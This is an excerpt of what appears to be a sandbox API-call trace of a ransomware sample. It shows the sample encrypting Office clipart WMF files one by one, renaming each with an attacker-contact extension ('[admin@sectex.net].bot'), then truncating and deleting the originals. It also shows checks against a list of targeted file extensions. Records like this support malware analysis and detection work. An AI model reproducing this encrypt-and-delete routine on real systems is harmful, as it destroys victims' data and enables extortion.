	[0159.109] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.109] SetEndOfFile (hFile=0x388) returned 1
	[0159.112] CloseHandle (hObject=0x388) returned 1
	[0159.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.112] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105520.wmf")) returned 1
	[0159.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.113] lstrlenW (lpString=".doc") returned 4
	[0159.113] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.113] lstrlenW (lpString=".docx") returned 5
	[0159.113] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.113] lstrlenW (lpString=".pdf") returned 4
	[0159.113] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.113] lstrlenW (lpString=".xls") returned 4
	[0159.113] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.113] lstrlenW (lpString=".xlsx") returned 5
	[0159.113] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.113] lstrlenW (lpString=".ppt") returned 4
	[0159.113] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.113] lstrlenW (lpString=".zip") returned 4
	[0159.113] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.113] lstrlenW (lpString=".rar") returned 4
	[0159.113] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.113] lstrlenW (lpString=".bz2") returned 4
	[0159.113] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.113] lstrlenW (lpString=".7z") returned 3
	[0159.113] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.113] lstrlenW (lpString=".dbf") returned 4
	[0159.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.113] lstrlenW (lpString=".1cd") returned 4
	[0159.114] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.114] lstrlenW (lpString=".jpg") returned 4
	[0159.114] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.114] lstrlenW (lpString=".doc") returned 4
	[0159.114] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.114] lstrlenW (lpString=".docx") returned 5
	[0159.114] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.114] lstrlenW (lpString=".pdf") returned 4
	[0159.114] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.114] lstrlenW (lpString=".xls") returned 4
	[0159.114] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.114] lstrlenW (lpString=".xlsx") returned 5
	[0159.114] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.114] lstrlenW (lpString=".ppt") returned 4
	[0159.114] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.114] lstrlenW (lpString=".zip") returned 4
	[0159.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.114] lstrlenW (lpString=".rar") returned 4
	[0159.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.114] lstrlenW (lpString=".bz2") returned 4
	[0159.114] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.114] lstrlenW (lpString=".7z") returned 3
	[0159.114] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.114] lstrlenW (lpString=".dbf") returned 4
	[0159.114] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.115] lstrlenW (lpString=".1cd") returned 4
	[0159.115] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105520.WMF") returned 63
	[0159.115] lstrlenW (lpString=".jpg") returned 4
	[0159.115] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.115] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.115] lstrlenW (lpString="J0105526.WMF") returned 12
	[0159.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.115] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=17332) returned 1
	[0159.115] CloseHandle (hObject=0x388) returned 1
	[0159.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf")) returned 0x20
	[0159.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.116] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.116] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0159.117] GetLastError () returned 0x0
	[0159.117] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x43b4, lpOverlapped=0x0) returned 1
	[0159.419] WriteFile (in: hFile=0x1d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x43c0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x43c0, lpOverlapped=0x0) returned 1
	[0159.420] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.420] WriteFile (in: hFile=0x1d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.420] SetEndOfFile (hFile=0x1d8) returned 1
	[0159.420] CloseHandle (hObject=0x1d8) returned 1
	[0159.420] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.420] SetEndOfFile (hFile=0x388) returned 1
	[0159.426] CloseHandle (hObject=0x388) returned 1
	[0159.426] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.464] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105526.wmf")) returned 1
	[0159.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.497] lstrlenW (lpString=".doc") returned 4
	[0159.497] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.497] lstrlenW (lpString=".docx") returned 5
	[0159.497] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.497] lstrlenW (lpString=".pdf") returned 4
	[0159.497] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.497] lstrlenW (lpString=".xls") returned 4
	[0159.497] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.497] lstrlenW (lpString=".xlsx") returned 5
	[0159.497] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.497] lstrlenW (lpString=".ppt") returned 4
	[0159.498] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.498] lstrlenW (lpString=".zip") returned 4
	[0159.498] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.498] lstrlenW (lpString=".rar") returned 4
	[0159.498] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.498] lstrlenW (lpString=".bz2") returned 4
	[0159.498] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.498] lstrlenW (lpString=".7z") returned 3
	[0159.498] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.498] lstrlenW (lpString=".dbf") returned 4
	[0159.498] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.498] lstrlenW (lpString=".1cd") returned 4
	[0159.498] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.498] lstrlenW (lpString=".jpg") returned 4
	[0159.498] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.498] lstrlenW (lpString=".doc") returned 4
	[0159.498] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.498] lstrlenW (lpString=".docx") returned 5
	[0159.498] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0159.498] lstrlenW (lpString=".pdf") returned 4
	[0159.498] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.498] lstrlenW (lpString=".xls") returned 4
	[0159.498] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.498] lstrlenW (lpString=".xlsx") returned 5
	[0159.499] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0159.499] lstrlenW (lpString=".ppt") returned 4
	[0159.499] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.499] lstrlenW (lpString=".zip") returned 4
	[0159.499] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.499] lstrlenW (lpString=".rar") returned 4
	[0159.499] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.499] lstrlenW (lpString=".bz2") returned 4
	[0159.499] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.499] lstrlenW (lpString=".7z") returned 3
	[0159.499] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.499] lstrlenW (lpString=".dbf") returned 4
	[0159.499] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.499] lstrlenW (lpString=".1cd") returned 4
	[0159.499] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105526.WMF") returned 63
	[0159.499] lstrlenW (lpString=".jpg") returned 4
	[0159.499] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.499] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.499] lstrlenW (lpString="J0106020.WMF") returned 12
	[0159.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.500] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=10060) returned 1
	[0159.500] CloseHandle (hObject=0x388) returned 1
	[0159.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf")) returned 0x20
	[0159.500] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.500] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0159.500] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.501] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0159.501] GetLastError () returned 0x0
	[0159.501] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x274c, lpOverlapped=0x0) returned 1
	[0159.521] WriteFile (in: hFile=0x1d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2750, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2750, lpOverlapped=0x0) returned 1
	[0159.522] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.522] WriteFile (in: hFile=0x1d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.522] SetEndOfFile (hFile=0x1d8) returned 1
	[0159.522] CloseHandle (hObject=0x1d8) returned 1
	[0159.522] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.522] SetEndOfFile (hFile=0x388) returned 1
	[0159.524] CloseHandle (hObject=0x388) returned 1
	[0159.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.536] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106020.wmf")) returned 1
	[0159.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.537] lstrlenW (lpString=".doc") returned 4
	[0159.537] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.537] lstrlenW (lpString=".docx") returned 5
	[0159.537] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.537] lstrlenW (lpString=".pdf") returned 4
	[0159.537] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.537] lstrlenW (lpString=".xls") returned 4
	[0159.537] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.537] lstrlenW (lpString=".xlsx") returned 5
	[0159.537] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.537] lstrlenW (lpString=".ppt") returned 4
	[0159.537] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.537] lstrlenW (lpString=".zip") returned 4
	[0159.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.537] lstrlenW (lpString=".rar") returned 4
	[0159.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.537] lstrlenW (lpString=".bz2") returned 4
	[0159.537] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.537] lstrlenW (lpString=".7z") returned 3
	[0159.537] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.537] lstrlenW (lpString=".dbf") returned 4
	[0159.537] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.537] lstrlenW (lpString=".1cd") returned 4
	[0159.537] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.537] lstrlenW (lpString=".jpg") returned 4
	[0159.538] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.538] lstrlenW (lpString=".doc") returned 4
	[0159.538] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.538] lstrlenW (lpString=".docx") returned 5
	[0159.538] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0159.538] lstrlenW (lpString=".pdf") returned 4
	[0159.538] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.538] lstrlenW (lpString=".xls") returned 4
	[0159.538] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.538] lstrlenW (lpString=".xlsx") returned 5
	[0159.538] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0159.538] lstrlenW (lpString=".ppt") returned 4
	[0159.538] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.538] lstrlenW (lpString=".zip") returned 4
	[0159.538] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.538] lstrlenW (lpString=".rar") returned 4
	[0159.538] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.538] lstrlenW (lpString=".bz2") returned 4
	[0159.538] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.538] lstrlenW (lpString=".7z") returned 3
	[0159.538] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.538] lstrlenW (lpString=".dbf") returned 4
	[0159.538] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.538] lstrlenW (lpString=".1cd") returned 4
	[0159.538] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106020.WMF") returned 63
	[0159.539] lstrlenW (lpString=".jpg") returned 4
	[0159.539] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.539] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.539] lstrlenW (lpString="J0106146.WMF") returned 12
	[0159.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.580] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=23548) returned 1
	[0159.580] CloseHandle (hObject=0x3f0) returned 1
	[0159.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf")) returned 0x20
	[0159.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.580] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.581] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106146.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.581] GetLastError () returned 0x0
	[0159.581] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x5bfc, lpOverlapped=0x0) returned 1
	[0159.617] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x5c00, lpOverlapped=0x0) returned 1
	[0159.619] ReadFile (in: hFile=0x3f0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.619] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.619] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.619] CloseHandle (hObject=0x3d0) returned 1
	[0159.619] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.619] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.621] CloseHandle (hObject=0x3f0) returned 1
	[0159.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106146.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
